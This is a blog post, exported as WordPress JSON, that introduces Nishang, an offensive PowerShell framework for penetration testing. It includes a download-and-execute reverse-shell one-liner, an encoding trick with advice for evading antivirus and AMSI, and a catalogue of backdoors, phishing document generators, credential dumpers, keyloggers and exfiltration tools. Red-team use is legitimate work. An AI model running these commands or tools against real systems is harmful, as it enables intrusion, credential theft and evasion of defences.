{"id":10662,"date":"2020-05-29T21:05:12","date_gmt":"2020-05-29T15:35:12","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=10662"},"modified":"2020-05-29T21:05:12","modified_gmt":"2020-05-29T15:35:12","slug":"nishang","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/nishang\/","title":{"rendered":"Nishang : Offensive PowerShell For Red Team, Penetration Testing &#038; Offensive Security"},"content":{"rendered":"\n<p><strong>Nishang <\/strong>is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.<\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Usage<\/strong><\/p>\n\n\n\n<p>Import all the scripts in the current PowerShell session (PowerShell v3 onwards).<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">PS C:\\nishang&gt; Import-Module .\\nishang.psm1<\/p>\n\n\n\n<p>Use the individual scripts with dot sourcing.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>PS C:\\nishang&gt; . C:\\nishang\\Gather\\Get-Information.ps1 <br>PS C:\\nishang&gt; Get-Information<\/strong><\/p>\n\n\n\n<p>To get help about any script or function, use:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>PS C:\\nishang&gt; Get-Help [scriptname] -full<\/strong><\/p>\n\n\n\n<p>Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. 
In all cases, the function name is the same as the script name.<\/p>\n\n\n\n<p>For example, to see the help about Get-WLAN-Keys.ps1, use<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>PS C:\\nishang&gt; . C:\\nishang\\Get-WLAN-Keys.ps1 <br>PS C:\\nishang&gt; Get-Help Get-WLAN-Keys -Full<\/strong><\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Anti Virus<\/strong><\/p>\n\n\n\n<p>Nishang scripts are flagged by many Anti Viruses as malicious. The scripts on a target are meant to be used in memory, which is very easy to do with PowerShell. There are two basic methods to execute PowerShell scripts in memory:<\/p>\n\n\n\n<p>Method 1. Use the in-memory download and execute: use the command below to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with the same name in the current PowerShell session.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">powershell iex (New-Object Net.WebClient).DownloadString(&#8216;http:\/\/&lt;yourwebserver&gt;\/Invoke-PowerShellTcp.ps1&#8217;);Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]<\/p>\n\n\n\n<p>Method 2. Use the <strong><code>-encodedcommand<\/code> (or <code>-e<\/code>)<\/strong> parameter of PowerShell. All the scripts in Nishang export a function with the same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using the encodedcommand parameter from a non-PowerShell shell. 
For the above example, add a function call (without quotes) <code><strong>\"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]\"<\/strong><\/code>.<\/p>\n\n\n\n<p>Encode the script using Invoke-Encode from Nishang:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>PS C:\\nishang&gt; . \\nishang\\Utility\\Invoke-Encode <br><br>PS C:\\nishang&gt; Invoke-Encode -DataToEncode C:\\nishang\\Shells\\Invoke-PowerShellTcp.ps1 -OutCommand<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Encoded data written to .\\encoded.txt<\/li><li>Encoded command written to .\\encodedcommand.txt<\/li><\/ul>\n\n\n\n<p>From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>C:\\Users\\target&gt; powershell -e [encodedscript]<\/strong><\/p>\n\n\n\n<p>If the scripts still get detected, changing the function and parameter names and removing the help content will help.<\/p>\n\n\n\n<p>In case Windows 10&#8217;s AMSI is still blocking script execution, see this blog: <a href=\"http:\/\/www.labofapenetrationtester.com\/2016\/09\/amsi.html\">http:\/\/www.labofapenetrationtester.com\/2016\/09\/amsi.html<\/a><\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Scripts<\/strong><\/p>\n\n\n\n<p>Nishang currently contains the following scripts and payloads.<\/p>\n\n\n\n<p class=\"has-background has-text-align-center 
has-light-green-cyan-background-color\"><strong>Active Directory<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/ActiveDirectory\/Set-DCShadowPermissions.ps1\">Set-DCShadowPermissions<\/a><ul><li>Modify AD objects to provide minimal permissions required for DCShadow.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Antak &#8211; the Webshell<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/tree\/master\/Antak-WebShell\">Antak<\/a><ul><li>Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Backdoors<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/HTTP-Backdoor.ps1\">HTTP-Backdoor<\/a><ul><li>A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/DNS_TXT_Pwnage.ps1\">DNS_TXT_Pwnage<\/a><ul><li>A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Execute-OnTime.ps1\">Execute-OnTime<\/a><ul><li>A backdoor which can execute PowerShell scripts at a given time on a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Gupt-Backdoor.ps1\">Gupt-Backdoor<\/a><ul><li>A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.<\/li><\/ul><\/li><li><a 
href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Add-ScrnSaveBackdoor.ps1\">Add-ScrnSaveBackdoor<\/a><ul><li>A backdoor which can use Windows screen saver for remote command and script execution.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Invoke-ADSBackdoor.ps1\">Invoke-ADSBackdoor<\/a><ul><li>A backdoor which can use alternate data streams and Windows Registry to achieve persistence.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Add-RegBackdoor.ps1\">Add-RegBackdoor<\/a><ul><li>A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Set-RemoteWMI.ps1\">Set-RemoteWMI<\/a><ul><li>Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Set-RemotePSRemoting.ps1\">Set-RemotePSRemoting<\/a><ul><li>Modify permissions of PowerShell remoting to allow access to a non-admin user.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Bypass<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Bypass\/Invoke-AmsiBypass.ps1\">Invoke-AmsiBypass<\/a><ul><li>Implementation of publicly known methods to bypass\/avoid AMSI.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Client<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-CHM.ps1\">Out-CHM<\/a><ul><li>Create infected CHM files which can execute PowerShell commands and scripts.<\/li><\/ul><\/li><li><a 
href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-Word.ps1\">Out-Word<\/a><ul><li>Create Word files and infect existing ones to run PowerShell commands and scripts.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-Excel.ps1\">Out-Excel<\/a><ul><li>Create Excel files and infect existing ones to run PowerShell commands and scripts.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-HTA.ps1\">Out-HTA<\/a><ul><li>Create a HTA file which can be deployed on a web server and used in phishing campaigns.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-Java.ps1\">Out-Java<\/a><ul><li>Create signed JAR files which can be used with applets for script and command execution.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-Shortcut.ps1\">Out-Shortcut<\/a><ul><li>Create shortcut files capable of executing PowerShell commands and scripts.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-WebQuery.ps1\">Out-WebQuery<\/a><ul><li>Create IQY files for phishing credentials and SMB hashes.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-JS.ps1\">Out-JS<\/a><ul><li>Create JS files capable of executing PowerShell commands and scripts.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-SCT.ps1\">Out-SCT<\/a><ul><li>Create SCT files capable of executing PowerShell commands and scripts.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-SCF.ps1\">Out-SCF<\/a><ul><li>Create a SCF file which can be used for capturing NTLM hash challenges.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center 
has-light-green-cyan-background-color\"><strong>Escalation<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Escalation\/Enable-DuplicateToken.ps1\">Enable-DuplicateToken<\/a><ul><li>When SYSTEM privileges are required.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Escalation\/Remove-Update.ps1\">Remove-Update<\/a><ul><li>Introduce vulnerabilities by removing patches.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Escalation\/Invoke-PsUACme.ps1\">Invoke-PsUACme<\/a><ul><li>Bypass UAC.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Execution<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Execution\/Download-Execute-PS.ps1\">Download-Execute-PS<\/a><ul><li>Download and execute a PowerShell script in memory.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Execution\/Download_Execute.ps1\">Download_Execute<\/a><ul><li>Download an executable in text format, convert it to an executable, and execute.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Execution\/Execute-Command-MSSQL.ps1\">Execute-Command-MSSQL<\/a><ul><li>Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Execution\/Execute-DNSTXT-Code.ps1\">Execute-DNSTXT-Code<\/a><ul><li>Execute shellcode in memory using DNS TXT queries.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Execution\/Out-RundllCommand.ps1\">Out-RundllCommand<\/a><ul><li>Execute PowerShell commands and scripts or a reverse PowerShell session using 
rundll32.exe.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Gather<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Check-VM.ps1\">Check-VM<\/a><ul><li>Check for a virtual machine.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Copy-VSS.ps1\">Copy-VSS<\/a><ul><li>Copy the SAM file using Volume Shadow Copy Service.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Credentials.ps1\">Invoke-CredentialsPhish<\/a><ul><li>Trick a user into giving credentials in plain text.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/FireBuster.ps1\">FireBuster<\/a> <a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/FireListener.ps1\">FireListener<\/a><ul><li>A pair of scripts for egress testing<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Get-Information.ps1\">Get-Information<\/a><ul><li>Get juicy information from a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Get-LSASecret.ps1\">Get-LSASecret<\/a><ul><li>Get LSA Secret from a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Get-PassHashes.ps1\">Get-PassHashes<\/a><ul><li>Get password hashes from a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Get-WLAN-Keys.ps1\">Get-WLAN-Keys<\/a><ul><li>Get WLAN keys in plain text from a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Keylogger.ps1\">Keylogger<\/a><ul><li>Log keystrokes from a target.<\/li><\/ul><\/li><li><a 
href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Invoke-MimikatzWDigestDowngrade.ps1\">Invoke-MimikatzWdigestDowngrade<\/a><ul><li>Dump user passwords in plain text on Windows 8.1 and Server 2012.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Get-PassHints.ps1\">Get-PassHints<\/a><ul><li>Get password hints of Windows users from a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Show-TargetScreen.ps1\">Show-TargetScreen<\/a><ul><li>Connect back and stream the target screen using MJPEG.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Invoke-Mimikatz.ps1\">Invoke-Mimikatz<\/a><ul><li>Load mimikatz in memory. Updated and with some customisation.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Invoke-Mimikittenz.ps1\">Invoke-Mimikittenz<\/a><ul><li>Extract juicy information from target process (like browsers) memory using regex.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Invoke-SSIDExfil.ps1\">Invoke-SSIDExfil<\/a><ul><li>Exfiltrate information like user credentials, using WLAN SSID.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Invoke-SessionGopher.ps1\">Invoke-SessionGopher<\/a><ul><li>Identify admin jump-boxes and\/or computers used to access Unix machines.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>MITM<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/MITM\/Invoke-Interceptor.ps1\">Invoke-Interceptor<\/a><ul><li>A local HTTPS proxy for MITM attacks.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center 
has-light-green-cyan-background-color\"><strong>Pivot<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Pivot\/Create-MultipleSessions.ps1\">Create-MultipleSessions<\/a><ul><li>Check credentials on multiple computers and create PSSessions.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Pivot\/Run-EXEonRemote.ps1\">Run-EXEonRemote<\/a> <ul><li>Copy and execute an executable on multiple machines.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Pivot\/Invoke-NetworkRelay.ps1\">Invoke-NetworkRelay<\/a> <ul><li>Create network relays between computers.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Prasadhak<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Prasadhak\/Prasadhak.ps1\">Prasadhak<\/a><ul><li>Check hashes of running processes against the VirusTotal database.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Scan<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Scan\/Brute-Force.ps1\">Brute-Force<\/a><ul><li>Brute force FTP, Active Directory, MSSQL, and Sharepoint.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Scan\/Port-Scan.ps1\">Port-Scan<\/a><ul><li>A handy port scanner.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Powerpreter<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/tree\/master\/powerpreter\">Powerpreter<\/a><ul><li>All the functionality of nishang in a single script module.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p 
class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Shells<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PsGcat.ps1\">Invoke-PsGcat<\/a><ul><li>Send commands and scripts to a specified Gmail account to be executed by Invoke-PsGcatAgent.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PsGcatAgent.ps1\">Invoke-PsGcatAgent<\/a><ul><li>Execute commands and scripts sent by Invoke-PsGcat.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcp.ps1\">Invoke-PowerShellTcp<\/a><ul><li>An interactive PowerShell reverse connect or bind shell.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcpOneLine.ps1\">Invoke-PowerShellTcpOneLine<\/a><ul><li>Stripped down version of Invoke-PowerShellTcp. Also contains a skeleton version which could fit in two tweets.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcpOneLineBind.ps1\">Invoke-PowerShellTcpOneLineBind<\/a><ul><li>Bind version of Invoke-PowerShellTcpOneLine.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellUdp.ps1\">Invoke-PowerShellUdp<\/a><ul><li>An interactive PowerShell reverse connect or bind shell over UDP.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellUdpOneLine.ps1\">Invoke-PowerShellUdpOneLine<\/a><ul><li>Stripped down version of Invoke-PowerShellUdp.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PoshRatHttps.ps1\">Invoke-PoshRatHttps<\/a><ul><li>Reverse interactive PowerShell over HTTPS.<\/li><\/ul><\/li><li><a 
href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PoshRatHttp.ps1\">Invoke-PoshRatHttp<\/a><ul><li>Reverse interactive PowerShell over HTTP.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Remove-PoshRat.ps1\">Remove-PoshRat<\/a><ul><li>Clean the system after using Invoke-PoshRatHttps.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellWmi.ps1\">Invoke-PowerShellWmi<\/a><ul><li>Interactive PowerShell using WMI.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellIcmp.ps1\">Invoke-PowerShellIcmp<\/a><ul><li>An interactive PowerShell reverse shell over ICMP.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-JSRatRundll.ps1\">Invoke-JSRatRundll<\/a><ul><li>An interactive PowerShell reverse shell over HTTP using rundll32.exe.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-JSRatRegsvr.ps1\">Invoke-JSRatRegsvr<\/a><ul><li>An interactive PowerShell reverse shell over HTTP using regsvr32.exe.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Utility<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Add-Exfiltration.ps1\">Add-Exfiltration<\/a><ul><li>Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Add-Persistence.ps1\">Add-Persistence<\/a><ul><li>Add reboot persistence capability to a script.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Remove-Persistence.ps1\">Remove-Persistence<\/a><ul><li>Remove persistence added by 
the Add-Persistence script.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Do-Exfiltration.ps1\">Do-Exfiltration<\/a><ul><li>Pipe (|) this to any script to exfiltrate the output.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Download.ps1\">Download<\/a><ul><li>Transfer a file to the target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Parse_Keys.ps1\">Parse_Keys<\/a><ul><li>Parse keys logged by the keylogger.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Invoke-Decode.ps1\">Invoke-Encode<\/a><ul><li>Encode and compress a script or string.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Invoke-Decode.ps1\">Invoke-Decode<\/a><ul><li>Decode and decompress a script or string from Invoke-Encode.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Start-CaptureServer.ps1\">Start-CaptureServer<\/a><ul><li>Run a web server which logs Basic authentication and SMB hashes.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/ConvertTo-ROT13.ps1\">ConvertTo-ROT13<\/a><ul><li>Encode a string to ROT13 or decode a ROT13 string.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Out-DnsTxt.ps1\">Out-DnsTxt<\/a><ul><li>Generate DNS TXT records which could be used with other scripts.<\/li><\/ul><\/li><li>[Base64ToString]<\/li><li>[StringToBase64]<\/li><li>[ExetoText]<\/li><li>[TexttoExe]<\/li><\/ul>\n\n\n\n<div class=\"wp-block-buttons aligncenter is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-background has-vivid-cyan-blue-background-color\" 
href=\"https:\/\/github.com\/samratashok\/nishang\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. Usage Import all the scripts in the current PowerShell session (PowerShell v3 onwards). PS C:\\nishang&gt; Import-Module .\\nishang.psm1 Use the individual scripts with dot [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":16326,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png","fifu_image_alt":"Nishang : Offensive PowerShell For Red Team, Penetration Testing & Offensive Security","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[2257,2467,2577,2768,2998],"class_list":["post-10662","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-nishang","tag-penetration-testing","tag-powershell","tag-red-team","tag-security"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Nishang :Red Team, Penetration Testing &amp; Offensive Security<\/title>\n<meta name=\"description\" content=\"Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/nishang\/\" \/>\n<meta property=\"og:locale\" 
content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Nishang :Red Team, Penetration Testing &amp; Offensive Security\" \/>\n<meta property=\"og:description\" content=\"Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/nishang\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2020-05-29T15:35:12+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n","yoast_head_json":{"title":"Nishang :Red Team, Penetration Testing & Offensive Security","description":"Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing","canonical":"https:\/\/kalilinuxtutorials.com\/nishang\/","article_published_time":"2020-05-29T15:35:12+00:00","author":"R K"}}